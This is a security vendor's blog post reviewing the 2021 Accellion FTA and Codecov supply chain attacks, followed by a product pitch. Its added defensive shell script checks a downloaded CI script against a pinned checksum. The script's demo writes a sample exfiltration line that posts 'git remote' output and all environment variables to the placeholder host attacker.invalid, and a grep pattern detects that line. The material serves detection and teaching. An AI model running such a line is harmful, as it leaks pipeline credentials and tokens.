If you have done any recent research into supply chain attacks, it quickly becomes apparent that, after ransomware (which was itself the payload in several of these cases), they are the trend most worth worrying about. There is a solid case that the pattern we have already seen with ransomware, where so-called "big game hunting" is now the norm and each attack is designed for maximum impact, applies equally here: one compromised supplier yields many victims, so attacks on the supply chain fit the bill.
Back in May, Wired did a good job of explaining the problem with supply chain attacks. Instead of a frontal assault on one network, the attacker finds a weak point elsewhere, typically a vendor or a shared component, that grants access at one-to-many scale. Adversaries are banking on someone somewhere not having robust security policies or best practices in place, and they get to roll for initiative first, so to speak. A study this year from ENISA, the EU's cybersecurity agency, echoes the same concern. More troubling still, in a large majority of the incidents ENISA examined, how the supplier had been compromised in the first place was simply not known.
There is also a profound psychological aspect to this: not being able to trust even the legitimate software you purchased introduces a measure of doubt into everyone's mind. With a supply chain attack it is no longer just malicious code with obvious ties to threat actors; it is whether your vendor's code is secure and, in some cases, whether your vendor's vendor is doing the right thing too. It also burdens everyone with checking the code, and, as ENISA put it: "customers demand products that are more cyber secure but that remain at a low cost, two needs that it is not always possible to reconcile." Rightfully so: we are all taking a leap of faith every day when we log into our home and work networks.
The concept itself is not new; the past decade alone has seen attacks on both well-known and relatively obscure applications and vendors. You know an incident is significant when the name of a small provider or niche application suddenly becomes a household name in the media. Outside of the big IT world and, more specifically, the managed service provider (MSP) space, who knew what Kaseya was before July 2021? The recent public arc of this story arguably started with the Adobe breach in 2013, continued with the CCleaner attack in 2017, and most recently reached the SolarWinds breach, with many victims in between. What sets the case studies below apart from those earlier incidents is that the recent attacks, Accellion's in particular, bear the marks of criminal actors rather than traditional nation-state APTs.
This year alone has seen several newsworthy attacks that deserve attention. We will spare you Kaseya and SolarWinds, which have been covered ad nauseam at this point. Instead, we will walk through two significant case studies, what we know now that some time has passed, and the lessons to be drawn from them.
By all accounts, this attack came to light around February 2021, but the intrusion into Accellion occurred in December 2020. Accellion was the maker of FTA (File Transfer Appliance), a roughly 20-year-old product for large file transfers that was due to reach End-of-Life (EoL) in April 2021. Because of the EoL, Accellion was actively migrating customers to newer products and services built on a different codebase.
Attackers chained four zero-day vulnerabilities (later assigned CVE-2021-27101 through CVE-2021-27104) to gain access to FTA servers and deploy a web shell, which they used to exfiltrate the customer files stored on the appliance. Accellion gave notice of the breach and assured customers that patches had been released, but, as the world discovered through February and the following months, the damage had already been done. Of roughly 300 FTA customers, fewer than 100 were affected by the attack, and fewer than 25 of those appear to have suffered significant data theft.
Looking at the victims, one of them a leading cybersecurity firm, it is likely they were doing many of the right things on their own networks. What they probably never saw was the weak point in a trusted third-party appliance that held sensitive data, perhaps had some level of privileged access, and was already on its way out.
This attack was significant because it was the first of several large campaigns involving the Clop ransomware operation. Already active since 2019, this was, for lack of a better phrase, their breakthrough event. Several notable changes in the actors' tactics were also observed in this incident.
At the time, Bleeping Computer reported that Clop operators were directly emailing the individuals whose information appeared in the stolen data, on the theory that those people contacting the affected companies would add pressure to the ransom demands. In another change of tactics, the attackers skipped the usual double-extortion model, in which data is stolen and systems are encrypted so that a ransom can be demanded for both, and went straight for data extortion: no encryption, just a ransom to withhold publication. This later became a hallmark of actors such as Marketo.
The lesson from this attack is that an application nearing EoL still needs to be kept secure until it is actually retired or deprecated. It is also worth noting that the low-and-slow tradecraft, technical proficiency, and use of zero-days put an end to the idea that criminal groups do not operate at nation-state levels. Criminal groups can clearly perform on par with any professional APT, but without the geopolitical constraints those groups have.
In April 2021, news emerged of an attack on Codecov, a popular code-coverage and testing vendor used by developers hosting code in various online repositories. At the end of January 2021, attackers exploited a flaw in Codecov's Docker image creation process to obtain a credential that let them modify Codecov's Bash Uploader script. They altered the script so that, when it ran inside a customer's CI pipeline, it captured information such as repository URLs and the pipeline's environment variables, which commonly hold credentials, tokens, and keys, and sent them to an attacker-controlled server. In other words, the attackers used Codecov's own distribution channel to run their code in customer environments and harvest the credentials needed for further attacks, including access to the source code those credentials protected. With over 29,000 customers using Codecov, the potential blast radius was very real.
Once Codecov discovered the problem, it went public, updated its code, took the affected servers offline, and worked with incident response firms to remediate. A long-running project to replace the Bash Uploader with a new NodeJS-based uploader was announced in June 2021, with the Bash version scheduled for deprecation in February 2022, according to Bleeping Computer. Codecov urged customers of the hosted service to re-roll any credentials, tokens, or keys that had been exposed in their CI environments and to review their code. Users of self-hosted Codecov instances were likely not affected, but according to media reporting at the time, several executives speaking anonymously said they would also review their accounts out of an abundance of caution.
The unsettling part of this breach is that there has yet to be any public statement on attribution or a conclusion to the investigation. By the end of April 2021, US federal law enforcement was reportedly investigating, but, in typical Department of Justice fashion, there had been no comment as of August 2021. In previous supply chain attacks, the full picture sometimes was not known until weeks or even months later. Attackers holding customer credentials could very well still be inside those networks, quietly reconnoitering, creating new accounts, escalating privileges, and further poisoning the well downstream.
At the time of writing, speculation across the web pointed towards a nation-state actor, given the speed with which customer information was captured and the technical proficiency displayed. A backdoor into so large a pool of potential victims, one that could serve national political or economic interests, would be within the remit of a nation-state APT. However, as we have seen with initial access brokers and the criminal underground, it may simply be a question of supply and demand.
This was yet another case of a tiny weak point causing havoc for downstream users: an overlooked step in the process that built Docker images allowed all of it to happen. To add insult to injury, the way the Bash Uploader was consumed, fetched from Codecov's server and piped straight into a shell, meant that downstream customers had to trust the server itself in addition to the code. The customer who reported the problem to Codecov noticed that the checksum of the script they had downloaded did not match the checksum published on GitHub, which triggered the investigation. Had that customer not checked, who knows how long it would have taken to discover, if ever. With attackers controlling the server and the processes running on it, that would have been a boon for them.
Given the prominence of some of the affected customers, among them popular software and hardware developers and security companies, this was again a case of enterprises likely doing the right thing on their own networks but being failed by a trusted partner. The move to a more secure NodeJS-based uploader and the other added features were good and well-timed, but the incident highlights the risks of depending on open-source and third-party code.
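The two checks a consumer of a remotely fetched CI script can make are the ones the paragraphs above point at: compare the script against a pinned checksum before executing it, and scan it for the "send $(env) somewhere with curl" shape of the modification. The following POSIX shell is an added example written for this article, not Codecov's or ReliaQuest's code. The sample uploader scripts, the hash pinned from them, and the placeholder host attacker.invalid are constructed for the demonstration; the real Bash Uploader and its published checksums are not used.

```shell
#!/bin/sh
# Added example: pin a remotely fetched CI script to a known SHA-256 and
# refuse to execute it on mismatch, plus a crude pre-flight scan for a curl
# call that embeds environment data. Not Codecov's code; the sample scripts
# and the host attacker.invalid are constructed for this demonstration.
set -eu

# Portable SHA-256 of a file (coreutils sha256sum on Linux, shasum elsewhere).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# verify_and_run FILE EXPECTED_SHA256
# Executes FILE with sh only if its hash equals the pinned value; otherwise
# reports the mismatch and returns 1 without executing anything.
verify_and_run() {
  file=$1
  expected=$2
  actual=$(sha256_of "$file")
  if [ "$actual" != "$expected" ]; then
    echo "REFUSING TO RUN $file: sha256 $actual does not match pinned $expected" >&2
    return 1
  fi
  sh "$file"
}

# no_env_exfil FILE
# Returns 1 if FILE contains a curl invocation whose arguments embed the
# output of env, printenv or git remote, the shape of the Codecov change.
no_env_exfil() {
  if grep -Eq 'curl[^|]*\$\((env|printenv|git remote)' "$1"; then
    echo "SUSPICIOUS: $1 sends environment data over the network" >&2
    return 1
  fi
  return 0
}

# Demonstration on constructed files.
demo() {
  tmp=$(mktemp -d)
  # A benign stand-in for the uploader, and the hash you would pin in CI config.
  printf '#!/bin/sh\necho "uploading coverage report"\n' > "$tmp/uploader.sh"
  pinned=$(sha256_of "$tmp/uploader.sh")
  # A tampered copy: same script plus an exfiltration line modelled on the
  # public description of the incident (placeholder host, no real endpoint).
  cp "$tmp/uploader.sh" "$tmp/tampered.sh"
  printf '%s\n' 'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://attacker.invalid/upload' >> "$tmp/tampered.sh"

  verify_and_run "$tmp/uploader.sh" "$pinned"   # hash matches, script runs
  if verify_and_run "$tmp/tampered.sh" "$pinned"; then
    echo "BUG: tampered script was executed" >&2
    return 1
  fi
  if no_env_exfil "$tmp/tampered.sh"; then
    echo "BUG: exfiltration line was not flagged" >&2
    return 1
  fi
  rm -rf "$tmp"
}

demo
```

In a real pipeline the pinned hash lives in version-controlled CI configuration next to the uploader version it belongs to, so that a change to the script on the vendor's server fails the build instead of silently running; the pattern scan is a coarse backstop, not a substitute for the hash check.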
In the wake of these significant incidents in just the first half of 2021, time will tell what further fallout we will be seeing this time in 2022. There is a good chance we will see ripples from these or future attacks, and we will be back writing about what happened and what could have gone better. Reliance on third parties is not going away anytime soon, as businesses outsource expertise to save time and money, and as more diverse services come online and businesses expand, any organization's attack surface will likely grow.
One key point from the ENISA study is that an organization may be well defended on its own estate and still have a vulnerable supply chain. Organizations need to perform due diligence on their partners and on the shared infrastructure and access that their vendors' products and services require. The hard part is that there is no single good way to do all of this, especially alone; it requires a holistic view of the threats to the business and its daily exposure to risk.
Although we are by no means a silver bullet here, Digital Shadows (now ReliaQuest) can help provide a view of the risk coming from suppliers. If you are curious about how we can help in the fight against these kinds of attacks, take a look at Search Light (now ReliaQuest GreyMatter Digital Risk Protection) for a week to see how intelligence can help, or request a demo.